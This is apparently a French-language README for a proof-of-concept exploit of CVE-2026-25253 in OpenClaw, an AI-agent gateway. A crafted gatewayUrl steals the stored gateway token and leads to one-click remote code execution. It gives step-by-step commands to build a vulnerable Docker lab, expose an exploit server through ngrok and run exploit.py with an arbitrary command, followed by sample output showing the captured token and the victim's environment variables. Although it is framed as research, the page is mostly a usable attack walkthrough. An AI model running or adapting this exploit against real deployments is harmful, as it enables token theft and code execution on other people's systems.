
OpenClaw Authentication Token Exfiltration
★ CVE-2026-25253 OpenClaw 1-Click Exécution de Code à Distance PoC ★
https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e
CVE-2026-25253 : Vulnérabilité d'exfiltration de jeton d'authentification OpenClaw
description: OpenClaw (également connu sous le nom de clawdbot ou Moltbot) avant la version v2026.1.29 permet aux attaquants d'exfiltrer un jeton d'authentification de passerelle stocké en fournissant une valeur gatewayUrl construite dans la chaîne de requête de l'interface de contrôle, qui établit automatiquement une connexion WebSocket sans validation ni confirmation de l'utilisateur. Cela peut conduire à un accès non autorisé à la passerelle et à une exécution de code à distance en un clic.
Dockerfile — construire l'environnement vulnérable OpenClawtemplates/ — pages web malveillantes utilisées par l'exploitconfig.txt — configuration OpenClaw utilisée dans l'environnement victimeexploit.py — serveur d'exploitrequirements.txt — dépendances du PoCdocker build -t openclaw-vuln .
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
http://127.0.0.1:18789/
d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66config.txtpip3 install -r requirements.txt
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
python3 exploit.py --host VOTRE_NOM_DE_HOST_NGROK --command "env"
Exemple :
python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
gatewayUrl de l'interface de contrôle de la victime[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
==================================================
[!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================
gatewayUrl dans l'interface de contrôleNous publions une analyse de CVE et de logiciels malveillants une fois par mois. Si vous êtes intéressé, veuillez suivre les liens ci-dessous pour consulter nos publications.